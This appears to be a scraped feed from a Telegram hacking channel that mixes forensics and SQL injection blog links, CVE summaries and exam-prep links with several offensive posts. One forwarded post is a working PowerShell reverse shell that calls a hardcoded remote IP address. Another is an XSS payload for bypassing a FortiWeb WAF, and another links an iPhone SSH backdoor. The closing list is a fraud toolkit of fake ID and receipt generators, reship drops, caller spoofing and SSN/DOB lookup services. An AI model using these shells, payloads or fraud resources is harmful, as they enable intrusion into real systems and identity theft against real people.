CrackCodes ๐Ÿ‡ฎ๐Ÿ‡ณ
15.9K subscribers
1.89K photos
386 videos
722 files
3.67K links
Official Websites: https://crackcodes.in |
For Bug Hunters: https://system32.ink

Admin: @MynK0x00
Admin Math: prapattimynk.crackcodes.in


Be Secure~
เคœเคฏ เคถเฅเคฐเฅ€ เคฐเคพเคฎ
Download Telegram
Forwarded from pkg
pkg
Photo
This is the translated message of the same Russian group who put the screenshot of Hacked Indian Portals earlier. Now, Delivers the post attack confession.
โคโ€๐Ÿ”ฅ1
CYBER SECURITY ROADMAP

TIME - LIVE
COME LETS DISCUSS ABOUT FUTURE IN CYBER SECURITY
OUR WEBSITE - system32.ink

BY PROFESSIONALS

ONLY ON THIS DISCUSSION GROUP
https://t.me/cyberdemonsD
A new blog on Digital Forensics

Learn How to use Volatility | Digital Forensics

https://techofide.com/blogs/what-is-digital-forensics-practical-demo-on-volatility/

This blog will teach you alot of new stuff about digital forensics

A beginner and don't know what exactly digital forensics?

I recommend you to go with this blog to clear your basic concepts

https://techofide.com/blogs/what-is-digital-forensics-how-to-use-digital-forensics-tools/

Join our group for more such Cyber security exclusive content

t.me/ethicalhackingtechofide
Forwarded from Prapatti ็ˆชใ„šๅ‡ าœ
PowerShell opens a TCP socket on the remote server and executes the input as a command, sending the output back.
Stupid backdoor!

usage:
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('106.12.252.10',6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
๐Ÿ‘4
epco-reserved-poc.dat
263 B
๐Ÿ’ฅShannon Baseband: Intra-object overflow in NrSmPcoCodec when decoding reserved options(CVE-2023-26076).
There is an intra-object overflow in Shannon Baseband, inside the 5G SM protocol implementation (NrSmMsgCodec as itโ€™s called in Shannon according to debug strings), when decoding the โ€œExtended protocol configuration optionsโ€ message (IEI = 0x7B).

The problem is that the size of the content isnโ€™t checked before copying it. As the length of content can be up to 255 bytes, copying the content to one of the 6 reservedPco buffers can result in an OOB write.
The array that holds the โ€œReservedโ€ option data isnโ€™t in a standalone allocation, rather this array is a part of a larger structure. Thus, an OOB write as described above overwrites other data within the same structure. It is currently unclear what kind of data lies after the 6 reservedPco buffers within reach of the overwrite.

๐Ÿ”–An โ€œExtended protocol configuration optionsโ€ message that triggers the overflow is provided in epco-reserved-poc.dat.
๐Ÿ”ฅExploiting aCropalypse: Recovering Truncated PNGs.
aCropalypse(CVE-2023-21036, Information disclosure in Pixel's Markup) is a serious privacy vulnerability in the Google Pixel's inbuilt screenshot editing tool, Markup, enabling partial recovery of the original, unedited image data of a cropped and/or redacted screenshot.

๐Ÿ”–Demo available here.
A video on Digital Forensics

Volatility

A video on Digital Forensics

https://youtu.be/wsaWF8lEnPw
Forwarded from ELEMENT-/-11
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from ELEMENT-/-11
This media is not supported in your browser
VIEW IN TELEGRAM
โคโ€๐Ÿ”ฅ2
Forwarded from ELEMENT-/-11
Equipment's Required For Ten Year Inspection and Maintaining Egress System of Pakistan's Fighter Jet JF-17.
bypass for the FortiWeb (Fortinet) WAF
usage:
"><iframe src=//14.rs>
i.e. instead of the standard XSS payload to execute js
๐Ÿ‘9
A new blog on Advance SQL Injection attacks.

Here is the link to the blog:

https://techofide.com/blogs/advanced-sql-injection-attack-sqli-blind-sql-injection-and-prevention/

If you are new and don't know what is SQL and SQLi then you can check our blog where we cover everything from scratch.

Here is the link to that blog:

https://techofide.com/blogs/sql-injection-attack-sqli-sql-injection-prevention-sql-injection-cheat-sheet-practical-demo/

Please show your support by liking the blog if you found our content helpful

Join our group for more such Cyber security content

t.me/ethicalhackingtechofide
Chaitra Navratri ki hardik shubhkamnaye
โค8
โ€‹โ€‹CEH-Exam-Questions

Planning To Take Certified Ethical Hacker (CEH)? Here are github repo with 125 questions and answers to help you prep for the test.

https://github.com/ryh04x/CEH-Exam-Questions

#cybersecurity #infosec
โ€‹โ€‹iPhone-SSH-Backdoor

This is a shell script that creates an SSH backdoor on an iPhone.

https://github.com/SleepTheGod/iPhone-SSH-Backdoor

#cybersecurity #infosec
๐Ÿ”ฐ| ADVANCED GOOGLE DORKING  |๐Ÿ”ฐ


๐Ÿ“Œ  1. Unlocking the Secrets of Google Dorking: A Beginnerโ€™s Guide to Search Hacking

๐Ÿ”— Link :- https://thecyberblogs.com/google-searching-basics-part-1/

๐Ÿ“Œ 2. Mastering the Art of Google Dorking: The Basic Rules You Need to Know

๐Ÿ”— Link :- https://thecyberblogs.com/mastering-the-art-of-google-dorking-the-basic-rules-you-need-to-know/

๐Ÿ“Œ 3. Mastering Google Dorking: Understanding the Basic Syntax

๐Ÿ”— Link :- https://thecyberblogs.com/mastering-google-dorking-understanding-the-basic-syntax/

๐Ÿ“Œ 4. Mastering Google Dorking: Unleashing the Power of Extended Search Operators

๐Ÿ”— Link :- https://thecyberblogs.com/mastering-google-dorking-unleashing-the-power-of-extended-search-operators/

๐Ÿ“Œ 5. Mastering Google Dorking: Unleashing the Power of Advanced Search Operators

๐Ÿ”— Link :- https://thecyberblogs.com/mastering-google-dorking-unleashing-the-power-of-advanced-search-operators/

๐Ÿ“Œ 6. Google Dorking: From Basic to Advanced Techniques for Smarter Web Searches

๐Ÿ”— Link :- https://thecyberblogs.com/mastering-google-dorking-unleashing-the-power-of-advanced-search-operators/

๐Ÿ“Œ 7. Unlocking the Power of Googleโ€™s Regex System for Smarter Searches

๐Ÿ”— Link :- https://thecyberblogs.com/learning-google-regex-system/

๐Ÿ“Œ 8. Uncovering SQL Injection Vulnerabilities with Google Dorking: A Step-by-Step Guide

๐Ÿ”— Link :- https://thecyberblogs.com/sqli-error-vulnerability/

๐Ÿ“Œ 9. Stringed or extended dorks

๐Ÿ”— Link :- https://thecyberblogs.com/learn-how-to-string-extend-google-dorks-part-9/

๐Ÿ“Œ 10. Master Google Dorking with a Practical Example | Boost Your Online Security Today

๐Ÿ”— Link :- https://thecyberblogs.com/learn-how-to-string-extend-google-dorks-part-9/

๐Ÿ“Œ 11. Uncover Hidden Information with Practical Examples of Google Dorking

๐Ÿ”— Link :- https://thecyberblogs.com/finding-various-vulnerabilities-using-google-dorking-part-9-1/

๐Ÿ“Œ 12. Advance google dorking cheatsheet pdf

๐Ÿ”— Link :- https://bit.ly/3T9EMP4
๐Ÿ‘1
๐Ÿ’ฅ"Actual" image recovery:
1๏ธโƒฃTake a JPEG image
2๏ธโƒฃMake a copy of it
3๏ธโƒฃCrop it in Snipping Tool
4๏ธโƒฃSave/overwrite
4๏ธโƒฃIn a hex editor, overwrite the EOI Marker (0xFFD9)
5๏ธโƒฃRepair it at http://jpg.repair
6๏ธโƒฃWonder how secure your cropped image data is
Forwarded from ๐™‹๐™ง๐™ค๐™ฉ๐™ค๐™˜๐™ค๐™ก ๐™‰๐™ž๐™˜๐™ 
#USEFUL SITES TO USE ON (Some Links Not Up To Date)

BROWSER FINGERPRINT TEST

https://panopticick.eff.org
https://whatleaks.com/

DRIVER LICENSE GENERATOR

https://www.elfqrin.com
http://www.highprogrammer.com/cgi-bin/uniqueid/dl

DROP/RESHIP

http://reship.com
https://www.myus.com
https://www.shipito.com
https://www.usunlocked.com/
https://virtualpostmail.com

DNS LEAK TEST

dnsleaktest.com
https://www.simplednscrypt.org/

VIRTUAL OFFICE

https://www.opusvirtualoffices.com/
https://www.regus.com/
https:cloudvo.com/
https://www.davincivirtual.com/fit-small-business
http://www.alliedoffices.com/

AREA PHONE CODES

https://www.allareacodes.com

SMS VERIFICATION

Smspool.net
https://app.truverifi.com/login
http://www.receive-sms-now.com
https://azersms.com/
http://www.textnow.com
https://www.blacktel.io/

SPOOF PHONE

https://www.spooftel.com
https://tracebust.com/
https://www.spoofcard.com
https:/ /securecall.club/login

USER AGENT CHECKER

http://whatsmyuseragent.com

FAX SENDER

https://portalpamfax.biz/PortalLogin/lnit/


FREE UDEMY COURSES

https://www.zapcourses.com
https://www.freshersgold.com


CUSTOM/FAKE RECEIPT MAKER

http://www.fakereceipt.us/sales_receipt.php
http://www.customreceipt.com/

SSN VALIDATOR

http://www.ssnvalidator.com

SSN DECODER

http://www.stevemorse.org/ssn/ssn.html

SOCKS CHECKER

https://fraud.cat/
https://xdedicvhnguh5s6k.onion/
https://www.ipqualityscore.com/
https://getipintel.net/index.php#web

EIN SEARCH

http://www.feinsearch.com
https://www.einfinder.com
htp://freerisa.benefitspro.com/
http://dor.wa.gov/content/doingbusiness/registermybusiness/BR
D/default.aspx
http://search.sunbiz.org/Inquiry/CorporationSearch/ByFeiNumber

RESIDENTIAL RDP ACCEPTING BITCOIN

https://www.resnetworking.com/
https://exavpn.com/
https:/ฤฑxdedicvhnguh5s6k.onion/

SSN/DOB SEARCH

https://ssndob.cc
https://robocheck.cm

MMN AUTOSEARCH

archives.com
ancestry.com

BACKGROUND CHECK

http://www.intelius.com
http://checkmate.com
http://equifax.com
http://thatsthem.com
https://www.mylife.com
https://t.me/tutorials_zone
https://www.peoplesmart.com
http://familytreenow.com
https://ogin.dicore.com/
https://www.tlo.com/
https://batchskiptracing.com/pricing/

CREDIT REPORT

https://www.quizzle.com
https://my.bankrate.com
freecreditreport.com
creditkarma.com/free-credit-report

โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–